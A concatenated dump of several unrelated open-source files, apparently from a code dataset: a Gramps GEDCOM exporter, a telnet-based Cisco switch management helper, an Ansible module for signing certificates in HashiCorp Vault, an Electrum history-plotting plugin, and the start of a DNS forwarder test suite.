elif attr_type == AttributeType.MOTHER_AGE:
self._writeln(2, 'WIFE')
self._writeln(3, 'AGE', attr.get_value())
self._note_references(event.get_note_list(), 2)
self._source_references(event.get_citation_list(), 2)
self._photos(event.get_media_list(), 2)
if place:
self._photos(place.get_media_list(), 2)
def write_ord(self, lds_ord, index):
"""
LDS_INDIVIDUAL_ORDINANCE:=
[
n [ BAPL | CONL ] {1:1}
+1 DATE <DATE_LDS_ORD> {0:1}
+1 TEMP <TEMPLE_CODE> {0:1}
+1 PLAC <PLACE_LIVING_ORDINANCE> {0:1}
+1 STAT <LDS_BAPTISM_DATE_STATUS> {0:1}
+2 DATE <CHANGE_DATE> {1:1}
+1 <<NOTE_STRUCTURE>> {0:M}
+1 <<SOURCE_CITATION>> {0:M} p.39
|
n ENDL {1:1}
+1 DATE <DATE_LDS_ORD> {0:1}
+1 TEMP <TEMPLE_CODE> {0:1}
+1 PLAC <PLACE_LIVING_ORDINANCE> {0:1}
+1 STAT <LDS_ENDOWMENT_DATE_STATUS> {0:1}
+2 DATE <CHANGE_DATE> {1:1}
+1 <<NOTE_STRUCTURE>> {0:M}
+1 <<SOURCE_CITATION>> {0:M}
|
n SLGC {1:1}
+1 DATE <DATE_LDS_ORD> {0:1}
+1 TEMP <TEMPLE_CODE> {0:1}
+1 PLAC <PLACE_LIVING_ORDINANCE> {0:1}
+1 FAMC @<XREF:FAM>@ {1:1}
+1 STAT <LDS_CHILD_SEALING_DATE_STATUS> {0:1}
+2 DATE <CHANGE_DATE> {1:1}
+1 <<NOTE_STRUCTURE>> {0:M}
+1 <<SOURCE_CITATION>> {0:M}
]
"""
self._writeln(index, LDS_ORD_NAME[lds_ord.get_type()])
self._date(index + 1, lds_ord.get_date_object())
if lds_ord.get_family_handle():
family_handle = lds_ord.get_family_handle()
family = self.dbase.get_family_from_handle(family_handle)
if family:
self._writeln(index + 1, 'FAMC', '@%s@' %
family.get_gramps_id())
if lds_ord.get_temple():
self._writeln(index + 1, 'TEMP', lds_ord.get_temple())
if lds_ord.get_place_handle():
place = self.dbase.get_place_from_handle(
lds_ord.get_place_handle())
self._place(place, lds_ord.get_date_object(), 2)
if lds_ord.get_status() != LdsOrd.STATUS_NONE:
self._writeln(2, 'STAT', LDS_STATUS[lds_ord.get_status()])
self._note_references(lds_ord.get_note_list(), index + 1)
self._source_references(lds_ord.get_citation_list(), index + 1)
def _date(self, level, date):
"""
Write the 'DATE' GEDCOM token, along with the date in GEDCOM's
expected format.
"""
self._datewritten = True
start = date.get_start_date()
if start != Date.EMPTY:
cal = date.get_calendar()
mod = date.get_modifier()
quality = date.get_quality()
if quality in libgedcom.DATE_QUALITY:
qual_text = libgedcom.DATE_QUALITY[quality] + " "
else:
qual_text = ""
if mod == Date.MOD_SPAN:
val = "%sFROM %s TO %s" % (
qual_text,
libgedcom.make_gedcom_date(start, cal, mod, None),
libgedcom.make_gedcom_date(date.get_stop_date(),
cal, mod, None))
elif mod == Date.MOD_RANGE:
val = "%sBET %s AND %s" % (
qual_text,
libgedcom.make_gedcom_date(start, cal, mod, None),
libgedcom.make_gedcom_date(date.get_stop_date(),
cal, mod, None))
else:
val = libgedcom.make_gedcom_date(start, cal, mod, quality)
self._writeln(level, 'DATE', val)
elif date.get_text():
self._writeln(level, 'DATE', date.get_text())
else:
self._datewritten = False
def _person_name(self, name, attr_nick):
"""
n NAME <NAME_PERSONAL> {1:1}
+1 NPFX <NAME_PIECE_PREFIX> {0:1}
+1 GIVN <NAME_PIECE_GIVEN> {0:1}
+1 NICK <NAME_PIECE_NICKNAME> {0:1}
+1 SPFX <NAME_PIECE_SURNAME_PREFIX {0:1}
+1 SURN <NAME_PIECE_SURNAME> {0:1}
+1 NSFX <NAME_PIECE_SUFFIX> {0:1}
+1 <<SOURCE_CITATION>> {0:M}
+1 <<NOTE_STRUCTURE>> {0:M}
"""
gedcom_name = name.get_gedcom_name()
firstname = name.get_first_name().strip()
surns = []
surprefs = []
for surn in name.get_surname_list():
surns.append(surn.get_surname().replace('/', '?'))
if surn.get_connector():
#we store connector with the surname
surns[-1] = surns[-1] + ' ' + surn.get_connector()
surprefs.append(surn.get_prefix().replace('/', '?'))
surname = ', '.join(surns)
surprefix = ', '.join(surprefs)
suffix = name.get_suffix()
title = name.get_title()
nick = name.get_nick_name()
if nick.strip() == '':
nick = attr_nick
self._writeln(1, 'NAME', gedcom_name)
if int(name.get_type()) == NameType.BIRTH:
pass
elif int(name.get_type()) == NameType.MARRIED:
self._writeln(2, 'TYPE', 'married')
elif int(name.get_type()) == NameType.AKA:
self._writeln(2, 'TYPE', 'aka')
else:
self._writeln(2, 'TYPE', name.get_type().xml_str())
if firstname:
self._writeln(2, 'GIVN', firstname)
if surprefix:
self._writeln(2, 'SPFX', surprefix)
if surname:
self._writeln(2, 'SURN', surname)
if name.get_suffix():
self._writeln(2, 'NSFX', suffix)
if name.get_title():
self._writeln(2, 'NPFX', title)
if nick:
self._writeln(2, 'NICK', nick)
self._source_references(name.get_citation_list(), 2)
self._note_references(name.get_note_list(), 2)
def _source_ref_record(self, level, citation_handle):
"""
n SOUR @<XREF:SOUR>@ /* pointer to source record */ {1:1}
+1 PAGE <WHERE_WITHIN_SOURCE> {0:1}
+1 EVEN <EVENT_TYPE_CITED_FROM> {0:1}
+2 ROLE <ROLE_IN_EVENT> {0:1}
+1 DATA {0:1}
+2 DATE <ENTRY_RECORDING_DATE> {0:1}
+2 TEXT <TEXT_FROM_SOURCE> {0:M}
+3 [ CONC | CONT ] <TEXT_FROM_SOURCE> {0:M}
+1 QUAY <CERTAINTY_ASSESSMENT> {0:1}
+1 <<MULTIMEDIA_LINK>> {0:M} ,*
+1 <<NOTE_STRUCTURE>> {0:M}
"""
citation = self.dbase.get_citation_from_handle(citation_handle)
src_handle = citation.get_reference_handle()
if src_handle is None:
return
src = self.dbase.get_source_from_handle(src_handle)
if src is None:
return
# Reference to the source
self._writeln(level, "SOUR", "@%s@" % src.get_gramps_id())
if citation.get_page() != "":
# PAGE <WHERE_WITHIN_SOURCE> can not have CONC lines.
# WHERE_WITHIN_SOURCE:= {Size=1:248}
# Maximize line to 248 and set limit to 248, for no line split
self._writeln(level + 1, 'PAGE', citation.get_page()[0:248],
limit=248)
conf = min(citation.get_confidence_level(),
Citation.CONF_VERY_HIGH)
if conf != Citation.CONF_NORMAL and conf != -1:
self._writeln(level + 1, "QUAY", QUALITY_MAP[conf])
if not citation.get_date_object().is_empty():
self._writeln(level + 1, 'DATA')
self._date(level + 2, citation.get_date_object())
if len(citation.get_note_list()) > 0:
note_list = [self.dbase.get_note_from_handle(h)
for h in citation.get_note_list()]
note_list = [n for n in note_list
if n.get_type() == NoteType.SOURCE_TEXT]
if note_list:
ref_text = note_list[0].get()
else:
ref_text = ""
if ref_text != "" and citation.get_date_object().is_empty():
self._writeln(level + 1, 'DATA')
if ref_text != "":
self._writeln(level + 2, "TEXT", ref_text)
note_list = [self.dbase.get_note_from_handle(h)
for h in citation.get_note_list()]
note_list = [n.handle for n in note_list
if n and n.get_type() != NoteType.SOURCE_TEXT]
self._note_references(note_list, level + 1)
self._photos(citation.get_media_list(), level + 1)
even = None
for srcattr in citation.get_attribute_list():
if str(srcattr.type) == "EVEN":
even = srcattr.value
self._writeln(level + 1, "EVEN", even)
break
if even:
for srcattr in citation.get_attribute_list():
if str(srcattr.type) == "EVEN:ROLE":
self._writeln(level + 2, "ROLE", srcattr.value)
break
def _photo(self, photo, level):
"""
n OBJE {1:1}
+1 FORM <MULTIMEDIA_FORMAT> {1:1}
+1 TITL <DESCRIPTIVE_TITLE> {0:1}
+1 FILE <MULTIMEDIA_FILE_REFERENCE> {1:1}
+1 <<NOTE_STRUCTURE>> {0:M}
"""
photo_obj_id = photo.get_reference_handle()
photo_obj = self.dbase.get_media_from_handle(photo_obj_id)
if photo_obj:
mime = photo_obj.get_mime_type()
form = MIME2GED.get(mime, mime)
path = media_path_full(self.dbase, photo_obj.get_path())
if not os.path.isfile(path):
return
self._writeln(level, 'OBJE')
if form:
self._writeln(level + 1, 'FORM', form)
self._writeln(level + 1, 'TITL', photo_obj.get_description())
self._writeln(level + 1, 'FILE', path, limit=255)
self._note_references(photo_obj.get_note_list(), level + 1)
def _place(self, place, dateobj, level):
"""
PLACE_STRUCTURE:=
n PLAC <PLACE_NAME> {1:1}
+1 FORM <PLACE_HIERARCHY> {0:1}
+1 FONE <PLACE_PHONETIC_VARIATION> {0:M} # not used
+2 TYPE <PHONETIC_TYPE> {1:1}
+1 ROMN <PLACE_ROMANIZED_VARIATION> {0:M} # not used
+2 TYPE <ROMANIZED_TYPE> {1:1}
+1 MAP {0:1}
+2 LATI <PLACE_LATITUDE> {1:1}
+2 LONG <PLACE_LONGITUDE> {1:1}
+1 <<NOTE_STRUCTURE>> {0:M}
"""
if place is None:
return
place_name = _pd.display(self.dbase, place, dateobj)
self._writeln(level, "PLAC", place_name.replace('\r', ' '), limit=120)
longitude = place.get_longitude()
latitude = place.get_latitude()
if longitude and latitude:
(latitude, longitude) = conv_lat_lon(latitude, longitude, "GEDCOM")
if longitude and latitude:
self._writeln(level + 1, "MAP")
self._writeln(level + 2, 'LATI', latitude)
self._writeln(level + 2, 'LONG', longitude)
# The Gedcom standard shows that an optional address structure can
# be written out in the event detail.
# http://homepages.rootsweb.com/~pmcbride/gedcom/55gcch2.htm#EVENT_DETAIL
location = get_main_location(self.dbase, place)
street = location.get(PlaceType.STREET)
locality = location.get(PlaceType.LOCALITY)
city = location.get(PlaceType.CITY)
state = location.get(PlaceType.STATE)
country = location.get(PlaceType.COUNTRY)
postal_code = place.get_code()
if street or locality or city or state or postal_code or country:
self._writeln(level, "ADDR", street)
if street:
self._writeln(level + 1, 'ADR1', street)
if locality:
self._writeln(level + 1, 'ADR2', locality)
if city:
self._writeln(level + 1, 'CITY', city)
if state:
self._writeln(level + 1, 'STAE', state)
if postal_code:
self._writeln(level + 1, 'POST', postal_code)
if country:
self._writeln(level + 1, 'CTRY', country)
self._note_references(place.get_note_list(), level + 1)
def __write_addr(self, level, addr):
"""
n ADDR <ADDRESS_LINE> {0:1}
+1 CONT <ADDRESS_LINE> {0:M}
+1 ADR1 <ADDRESS_LINE1> {0:1} (Street)
+1 ADR2 <ADDRESS_LINE2> {0:1} (Locality)
+1 CITY <ADDRESS_CITY> {0:1}
+1 STAE <ADDRESS_STATE> {0:1}
+1 POST <ADDRESS_POSTAL_CODE> {0:1}
+1 CTRY <ADDRESS_COUNTRY> {0:1}
This is done along the lines suggested by Tamura Jones in
http://www.tamurajones.net/GEDCOMADDR.xhtml as a result of bug 6382.
"GEDCOM writers should always use the structured address format,
and it use it for all addresses, including the submitter address and
their own corporate address." "Vendors that want their product to pass
even the strictest GEDCOM validation, should include export to the old
free-form format..." [This goes on to say the free-form should be an
option, but we have not made it an option in Gramps].
@param level: The level number for the ADDR tag
@type level: Integer
@param addr: The location or address
@type addr: [a super-type of] LocationBase
"""
if addr.get_street() or addr.get_locality() or addr.get_city() or \
addr.get_state() or addr.get_postal_code or addr.get_country():
self._writeln(level, 'ADDR', addr.get_street())
if addr.get_locality():
self._writeln(level + 1, 'CONT', addr.get_locality())
if addr.get_city():
self._writeln(level + 1, 'CONT', addr.get_city())
if addr.get_state():
self._writeln(level + 1, 'CONT', addr.get_state())
if addr.get_postal_code():
self._writeln(level + 1, 'CONT', addr.get_postal_code())
if addr.get_country():
self._writeln(level + 1, 'CONT', addr.get_country())
if addr.get_street():
self._writeln(level + 1, 'ADR1', addr.get_street())
if addr.get_locality():
self._writeln(level + 1, 'ADR2', addr.get_locality())
if addr.get_city():
self._writeln(level + 1, 'CITY', addr.get_city())
if addr.get_state():
self._writeln(level + 1, 'STAE', addr.get_state())
if addr.get_postal_code():
self._writeln(level + 1, 'POST', addr.get_postal_code())
if addr.get_country():
self._writeln(level + 1, 'CTRY', addr.get_country())
#-------------------------------------------------------------------------
#
#
#
#-------------------------------------------------------------------------
def export_data(database, filename, user, option_box=None):
"""
External interface used to register with the plugin system.
"""
ret = False
try:
ged_write = GedcomWriter(database, user, option_box)
ret = ged_write.write_gedcom_file(filename)
except IOError as msg:
msg2 = _("Could not create %s") % filename
user.notify_error(msg2, str(msg))
except DatabaseError as msg:
user.notify_db_error("%s\n%s" % (_("GEDCOM Export failed"), str(msg)))
return ret
| gpl-2.0 | -1,091,929,293,636,996,400 | 37.137667 | 81 | 0.520455 | false |
berserkerbernhard/Lidskjalv | code/networkmonitor/modules/misc/switchhandler.py | 1 | 6889 | from modules.lidskjalvloggingtools import loginfo
import telnetlib
import time
WAIT = 5
class SwitchHandler():
def __init__(self, u, p, e):
self.loginpasswords = [p]
self.loginusername = u
self.loginenable = e
self.logintries = 5
self.telnettimeout = 10
def get_switch_name(self, tn):
if tn is None:
raise Exception("NOT A TELNET CONNECTION!!!!!!")
tn.write(b"\n")
RES = str(tn.read_until(b"#", 2))
loginfo(RES)
switchname = RES.split("#")[0].split("\\n")[1]
loginfo("switchname: %s" % switchname)
return switchname
def login_to_switch(self, tn):
if tn is None:
raise Exception("NOT A TELNET CONNECTION",
"in function loginToSwitch!!!!!!")
for loginpassword in self.loginpasswords:
loginfo("Trying password: %s" % (loginpassword))
RES = tn.read_until(b":", 2)
loginfo("Connection read data: %s" % RES)
loginfo(">>>> Sending password: %s" % loginpassword)
tn.write(loginpassword.encode('ascii') + b"\n")
loginfo(">>>> Sending password DONE")
RES = tn.read_until(b":", 2)
loginfo("Connection read data: %s" % RES)
if ">" in str(RES):
loginfo("+++++++++ Logged in !!!!!!!!!!")
return [tn, loginpassword]
return None
def enableSwitch(self, tn):
print(tn)
loginfo("enableSwitch start")
if tn is None:
raise Exception("NOT A TELNET CONNECTION!!!!!!")
tn.write(b"\n")
RES = tn.read_until(b":", 2)
print("RES:", RES)
loginfo("RES: %s" % str(RES))
if "Bad passwords" in str(RES):
print("Try log in again with another password(%s)" %
self.loginenable)
if ">" in str(RES) \
or "Password" in str(RES) \
or "User Access Verification" in str(RES):
loginfo("Ready for enable ...")
t = b"enable\n"
print(t)
tn.write(t)
RES = tn.read_until(b":", 2)
print("RES:", RES)
loginfo("Attempting to log in.")
# mbs
loginfo("Sending enable: %s" % self.loginenable)
print("Sending enable: %s" % self.loginenable)
tn.write(self.loginenable.encode('ascii') + b"\n")
print("login enable sent. Testing for response.")
RES = tn.read_until(b"#", self.telnettimeout)
loginfo(RES)
if "#" in str(RES):
loginfo("We're logged in.")
return tn
else:
loginfo("Still not logged in. :-(")
loginfo("Nothing happended!!! WTF???")
return None
def openTelnetConnection(self, HOST):
print("Try login to host: %s" % HOST)
for thistry in range(self.logintries):
loginfo("Try: %s" % str(thistry + 1))
try:
print(HOST, 23, self.telnettimeout)
tn = telnetlib.Telnet(HOST,
23,
self.telnettimeout)
loginfo("Connection established to %s." % HOST)
return tn
except:
loginfo("Failed to open connection: %s" % HOST)
return None
# def setVTPMode(self, tn, HOSTNAME, device):
# tn.write("\r\n")
# tn.read_until("#", WAIT)
# tn.write("\r\n")
# tn.read_until("#", WAIT)
# tn.write("\r\n")
# tn.read_until("#", WAIT)
# tn.write("conf t\r\n")
# resultdata = tn.read_until("#", 5)
# if device == "172.17.128.61":
# print "VTP Server:", device
# tn.write("vtp mode server\r\n")
# else:
# print "VTP Client:", device
# tn.write("vtp mode client\r\n")
# resultdata = tn.read_until("#", 5)
# tn.write("vtp domain VTP-20141209-1\r\n")
# resultdata = tn.read_until("#", 5)
# tn.write("vtp password FSNAAL-VTP\r\n")
# resultdata = tn.read_until("#", 5)
# tn.write("exit\r\n")
# resultdata = tn.read_until("#", 5)
# tn.write("wr\r\n")
# resultdata = tn.read_until("#", 5)
def setTermLen(self, tn):
tn.write(b"terminal length 0\n")
loginfo(tn.read_until(b"#", WAIT))
def get_interfaces(self, tn):
tn.write(b"\r\n")
loginfo(tn.read_until(b"#", WAIT))
tn.write(b"\r\n")
loginfo(tn.read_until(b"#", WAIT))
tn.write(b"\r\n")
loginfo(tn.read_until(b"#", WAIT))
tn.write(b"sh int\r\n")
r = str(tn.read_until(b"#", self.telnettimeout))
r = "\n".join(r.split("\\r\\n"))
loginfo("Result from show interfaces:\n%s" % r)
return r
def get_cdp_neighbors_detail(self, tn):
tn.write(b"\r\n")
loginfo(tn.read_until(b"#", WAIT))
tn.write(b"\r\n")
loginfo(tn.read_until(b"#", WAIT))
tn.write(b"\r\n")
loginfo(tn.read_until(b"#", WAIT))
tn.write(b"sh cdp neighbors detail\r\n")
resultdata = tn.read_until(b"#", self.telnettimeout)
return resultdata.decode()
def writeDescriptionToInterface(self, tn, interface, description):
loginfo("1: %s" % tn.read_until(b"#", WAIT))
tn.write(b"conf t\r\n")
loginfo("2: %s" % tn.read_until(b"#", WAIT))
sendstring = "int %s\r\n" % interface
tn.write(sendstring.encode())
loginfo(tn.read_until(b"#", WAIT))
loginfo("3: %s" % tn.read_until(b"#", WAIT))
sendstring = "description %s %s\r\n" % (description, time.ctime())
tn.write(sendstring.encode())
loginfo(tn.read_until(b"#", WAIT))
loginfo("4: %s" % tn.read_until(b"#", WAIT))
tn.write(b"exit\r\n")
loginfo("5: %s" % tn.read_until(b"#", WAIT))
tn.write(b"exit\r\n")
loginfo("6: %s" % tn.read_until(b"#", WAIT))
tn.write(b"wr\r\n")
loginfo(tn.read_until(b"#", WAIT))
def showRunningConfig(self, tn):
tn.read_until(b"#", WAIT)
tn.write(b"sh run\r\n")
r = tn.read_until(b"#", WAIT)
r = str(r)
r = r.replace("\\r\\n", "\n")
# print(r)
return r
def addDescriptionToAllTrunkInterfaces(self, tn):
neighbors = self.getCdpNeighborsDetail(tn, "")
# print("neighbors", neighbors)
for neighbor in neighbors:
# print("neighbor", neighbor)
if neighbor != ["", "", ""]:
self.writeDescriptionToInterface(tn,
neighbor[1],
"%s %s" % (neighbor[0],
neighbor[2]))
| gpl-3.0 | 8,448,278,225,030,082,000 | 32.935961 | 74 | 0.497169 | false |
TerryHowe/ansible-modules-hashivault | ansible/modules/hashivault/hashivault_pki_cert_sign.py | 1 | 6865 | #!/usr/bin/env python
from ansible.module_utils.hashivault import hashivault_auth_client
from ansible.module_utils.hashivault import hashivault_argspec
from ansible.module_utils.hashivault import hashivault_init
from ansible.module_utils.hashivault import hashiwrapper
ANSIBLE_METADATA = {'status': ['preview'], 'supported_by': 'community', 'version': '1.1'}
DOCUMENTATION = r'''
---
module: hashivault_pki_cert_sign
version_added: "4.5.0"
short_description: Hashicorp Vault PKI Sign CSR ( Certificate / Intermediate / Verbatim )
description:
- This module signs a new certificate based upon the provided CSR and the supplied parameters.
options:
csr:
recuired: true
description:
- Specifies the PEM-encoded CSR.
role:
description:
- Specifies the name of the role to create.
- 'For *verbatim* type if set, the following parameters from the role will have effect: `ttl`, `max_ttl`,
`generate_lease`, and `no_store`.'
common_name:
description:
- Specifies the requested CN for the certificate. If the CN is allowed by role policy, it will be issued.
mount_point:
default: pki
description:
- location where secrets engine is mounted. also known as path
type:
type: str
description:
- Sign a new certificate with `certificate` based upon the provided CSR and the supplied parameters, subject
to the restrictions contained in the role named in the endpoint. The issuing CA certificate is returned as
well, so that only the root CA need be in a client's trust store.
- Use `intermediate` to configure CA certificate to issue a certificate with appropriate values for
acting as an intermediate CA. Distribution points use the values set via config/urls. Values set in the
CSR are ignored unless use_csr_values is set to true, in which case the values from the CSR are used
verbatim.
- Use `verbatim` to sign a new certificate based upon the provided CSR. Values are taken verbatim from the
CSR; the only restriction is that this endpoint will refuse to issue an intermediate CA certificate (use
`intermediate` type for that functionality.)
choices: ["certificate", "intermediate", "verbatim"]
default: certificate
extra_params:
description:
Extra parameters depending on the type.
type: dict
extends_documentation_fragment:
- hashivault
'''
EXAMPLES = r'''
---
- hosts: localhost
tasks:
- hashivault_pki_cert_sign:
role: 'tester'
common_name: 'test.example.com'
register: cert
- debug: msg="{{ cert }}"
'''
def main():
argspec = hashivault_argspec()
argspec['csr'] = dict(required=True, type='str')
argspec['role'] = dict(required=False, type='str')
argspec['common_name'] = dict(required=False, type='str')
argspec['extra_params'] = dict(required=False, type='dict', default={})
argspec['mount_point'] = dict(required=False, type='str', default='pki')
argspec['type'] = dict(required=False, type='str', default='certificate', choices=["certificate", "intermediate",
"verbatim"])
module = hashivault_init(argspec)
result = hashivault_pki_cert_sign(module)
if result.get('failed'):
module.fail_json(**result)
else:
module.exit_json(**result)
def certificate(params, mount_point, client):
csr = params.get('csr')
common_name = params.get('common_name')
extra_params = params.get('extra_params')
role = params.get('role').strip('/')
# check if role exists
try:
current_state = client.secrets.pki.read_role(name=role, mount_point=mount_point).get('data')
except Exception:
current_state = {}
if not current_state:
return {'failed': True, 'rc': 1, 'msg': 'role not found or permission denied'}
if not common_name:
return {'failed': True, 'rc': 1, 'msg': 'Missing required options: common_name'}
result = {"changed": False, "rc": 0}
try:
result['data'] = client.secrets.pki.sign_certificate(csr=csr, name=role, mount_point=mount_point,
common_name=common_name,
extra_params=extra_params).get('data')
result['changed'] = True
except Exception as e:
result['rc'] = 1
result['failed'] = True
result['msg'] = u"Exception: " + str(e)
return result
def intermediate(params, mount_point, client):
csr = params.get('csr')
common_name = params.get('common_name')
extra_params = params.get('extra_params')
if not common_name:
return {'failed': True, 'rc': 1, 'msg': 'Missing required options: common_name'}
result = {"changed": False, "rc": 0}
try:
result['data'] = client.secrets.pki.sign_intermediate(csr=csr, common_name=common_name,
extra_params=extra_params,
mount_point=mount_point).get('data')
result['changed'] = True
except Exception as e:
result['rc'] = 1
result['failed'] = True
result['msg'] = u"Exception: " + str(e)
return result
def verbatim(params, mount_point, client):
csr = params.get('csr')
extra_params = params.get('extra_params')
role = params.get('role').strip('/')
# check if role exists
try:
current_state = client.secrets.pki.read_role(name=role, mount_point=mount_point).get('data')
except Exception:
current_state = {}
if not current_state:
return {'failed': True, 'rc': 1, 'msg': 'role not found or permission denied'}
result = {"changed": False, "rc": 0}
try:
result['data'] = client.secrets.pki.sign_verbatim(csr=csr, name=role, extra_params=extra_params,
mount_point=mount_point).get('data')
result['changed'] = True
except Exception as e:
result['rc'] = 1
result['failed'] = True
result['msg'] = u"Exception: " + str(e)
return result
@hashiwrapper
def hashivault_pki_cert_sign(module):
supported_types = {
'certificate': certificate,
'intermediate': intermediate,
'verbatim': verbatim
}
params = module.params
client = hashivault_auth_client(params)
mount_point = params.get('mount_point').strip('/')
return supported_types[params.get('type')](params=params, mount_point=mount_point, client=client)
if __name__ == '__main__':
main()
| mit | -7,423,627,915,068,720,000 | 37.567416 | 120 | 0.606555 | false |
justinvforvendetta/electrum-boli | plugins/plot.py | 1 | 3669 | from PyQt4.QtGui import *
from electrum_boli.plugins import BasePlugin, hook
from electrum_boli.i18n import _
import datetime
from electrum_boli.util import format_satoshis
from electrum_boli.bitcoin import COIN
try:
import matplotlib.pyplot as plt
import matplotlib.dates as md
from matplotlib.patches import Ellipse
from matplotlib.offsetbox import AnchoredOffsetbox, TextArea, DrawingArea, HPacker
flag_matlib=True
except:
flag_matlib=False
class Plugin(BasePlugin):
def is_available(self):
if flag_matlib:
return True
else:
return False
@hook
def init_qt(self, gui):
self.win = gui.main_window
@hook
def export_history_dialog(self, d,hbox):
self.wallet = d.wallet
history = self.wallet.get_history()
if len(history) > 0:
b = QPushButton(_("Preview plot"))
hbox.addWidget(b)
b.clicked.connect(lambda: self.do_plot(self.wallet, history))
else:
b = QPushButton(_("No history to plot"))
hbox.addWidget(b)
def do_plot(self, wallet, history):
balance_Val=[]
fee_val=[]
value_val=[]
datenums=[]
unknown_trans = 0
pending_trans = 0
counter_trans = 0
balance = 0
for item in history:
tx_hash, confirmations, value, timestamp, balance = item
if confirmations:
if timestamp is not None:
try:
datenums.append(md.date2num(datetime.datetime.fromtimestamp(timestamp)))
balance_Val.append(1000.*balance/COIN)
except [RuntimeError, TypeError, NameError] as reason:
unknown_trans += 1
pass
else:
unknown_trans += 1
else:
pending_trans += 1
value_val.append(1000.*value/COIN)
if tx_hash:
label, is_default_label = wallet.get_label(tx_hash)
label = label.encode('utf-8')
else:
label = ""
f, axarr = plt.subplots(2, sharex=True)
plt.subplots_adjust(bottom=0.2)
plt.xticks( rotation=25 )
ax=plt.gca()
x=19
test11="Unknown transactions = "+str(unknown_trans)+" Pending transactions = "+str(pending_trans)+" ."
box1 = TextArea(" Test : Number of pending transactions", textprops=dict(color="k"))
box1.set_text(test11)
box = HPacker(children=[box1],
align="center",
pad=0.1, sep=15)
anchored_box = AnchoredOffsetbox(loc=3,
child=box, pad=0.5,
frameon=True,
bbox_to_anchor=(0.5, 1.02),
bbox_transform=ax.transAxes,
borderpad=0.5,
)
ax.add_artist(anchored_box)
plt.ylabel('mBOLI')
plt.xlabel('Dates')
xfmt = md.DateFormatter('%Y-%m-%d')
ax.xaxis.set_major_formatter(xfmt)
axarr[0].plot(datenums,balance_Val,marker='o',linestyle='-',color='blue',label='Balance')
axarr[0].legend(loc='upper left')
axarr[0].set_title('History Transactions')
xfmt = md.DateFormatter('%Y-%m-%d')
ax.xaxis.set_major_formatter(xfmt)
axarr[1].plot(datenums,value_val,marker='o',linestyle='-',color='green',label='Value')
axarr[1].legend(loc='upper left')
# plt.annotate('unknown transaction = %d \n pending transactions = %d' %(unknown_trans,pending_trans),xy=(0.7,0.05),xycoords='axes fraction',size=12)
plt.show()
| gpl-3.0 | -4,475,255,244,508,078,600 | 28.119048 | 156 | 0.562551 | false |
CZ-NIC/deckard | tools/forwarder_check.py | 1 | 18882 | """Test suite to test forwarders
Invoke with `python3 -m pytest forwarder_check.py --forwarder [IP of forwarder]`"""
# pylint: disable=C0301,C0111,C0103
# flake8: noqa
import ipaddress
import dns.message
# NOTE silence incorrectly reported error, may be removed once it passes in CI
import pytest # pylint: disable=wrong-import-order
import answer_checker
ALL = {"opcode", "qtype", "qname", "flags", "rcode", "answer", "authority", "additional"}
HEADER = {"opcode", "qtype", "qname", "flags", "rcode"}
VERSION_QUERY = dns.message.make_query("_version.test.knot-resolver.cz", "TXT")
VERSION_ANSWER = dns.message.from_text(""";
opcode QUERY
rcode NOERROR
flags QR RA RD
;QUESTION
_version.test.knot-resolver.cz. IN TXT
;ANSWER
_version.test.knot-resolver.cz. 3600 IN TXT "1"
;AUTHORITY
;ADDITIONAL
""")
def test_zone_version(forwarder):
return answer_checker.send_and_check(VERSION_QUERY,
VERSION_ANSWER,
forwarder,
ALL - {"additional", "authority"})
SIMPLE_QUERY = answer_checker.make_random_case_query("good-a.test.knot-resolver.cz", "A")
SIMPLE_ANSWER = dns.message.from_text(""";
opcode QUERY
rcode NOERROR
flags QR RD RA
;QUESTION
good-a.test.knot-resolver.cz. IN A
;ANSWER
good-a.test.knot-resolver.cz. 3600 IN A 217.31.192.130
;AUTHORITY
;ADDITIONAL""")
def test_supports_simple_answers(forwarder, tcp):
return answer_checker.send_and_check(SIMPLE_QUERY,
SIMPLE_ANSWER,
forwarder,
ALL - {"additional", "authority"},
tcp=tcp)
EDNS_QUERY = answer_checker.make_random_case_query("good-a.test.knot-resolver.cz", "A", use_edns=0)
def test_supports_EDNS0(forwarder, tcp):
answer = answer_checker.get_answer(EDNS_QUERY, forwarder, tcp=tcp)
if answer.edns != 0:
raise ValueError("EDNS0 not supported")
DO_QUERY = answer_checker.make_random_case_query("good-a.test.knot-resolver.cz", "A", want_dnssec=True)
def test_supports_DO(forwarder, tcp):
answer = answer_checker.get_answer(DO_QUERY, forwarder, tcp=tcp)
if not answer.flags & dns.flags.DO:
raise ValueError("DO bit sent, but not recieved")
CD_QUERY = answer_checker.make_random_case_query("good-a.test.knot-resolver.cz", "A", want_dnssec=True)
CD_QUERY.flags += dns.flags.CD
def test_supports_CD(forwarder, tcp):
answer = answer_checker.get_answer(CD_QUERY, forwarder, tcp=tcp)
if not answer.flags & dns.flags.CD:
raise ValueError("CD bit sent, but not recieved")
RRSIG_QUERY = answer_checker.make_random_case_query("good-a.test.knot-resolver.cz", "A", want_dnssec=True)
RRSIG_ANSWER = dns.message.from_text(""";
opcode QUERY
rcode NOERROR
flags QR RD RA AD
edns 0
eflags DO
payload 4096
;QUESTION
good-a.test.knot-resolver.cz. IN A
;ANSWER
good-a.test.knot-resolver.cz. 3600 IN A 217.31.192.130
good-a.test.knot-resolver.cz. 3600 IN RRSIG A 13 4 3600 20370119135450 20190205122450 58 test.knot-resolver.cz. n7BfrYwvRztj8khwefZxnVUSBm6vvIWH 3HGTfswPSUKqNrg6yqMIxm0dpLVPSIna hPnTnP3CP6G4SEfvAGk33w==
;AUTHORITY
;ADDITIONAL""")
def test_returns_RRSIG(forwarder, tcp):
return answer_checker.send_and_check(RRSIG_QUERY,
RRSIG_ANSWER,
forwarder,
HEADER | {"answerrrsigs"},
tcp=tcp)
DNSKEY_QUERY = answer_checker.make_random_case_query("test.knot-resolver.cz", "DNSKEY", want_dnssec=True)
DNSKEY_ANSWER = dns.message.from_text(""";
opcode QUERY
rcode NOERROR
flags QR RD RA AD
edns 0
eflags DO
payload 4096
;QUESTION
test.knot-resolver.cz. IN DNSKEY
;ANSWER
test.knot-resolver.cz. 3600 IN DNSKEY 256 3 13 b5ZQUzN5iD9ercgxPeeEh9qI8UzazMa6 vo8GCART4iQNzAcsB6xPYVopHKcjyssH MUiDoQgrjVd6hOLWQqnCtg==
test.knot-resolver.cz. 3600 IN DNSKEY 257 3 13 xrbuMAmJy3GlxUF46tJgP64cmExKWQBg iRGeLhfub9x3DV69D+2m1zom+CyqHsYY VDIjYOueGzj/8XFucg1bDw==
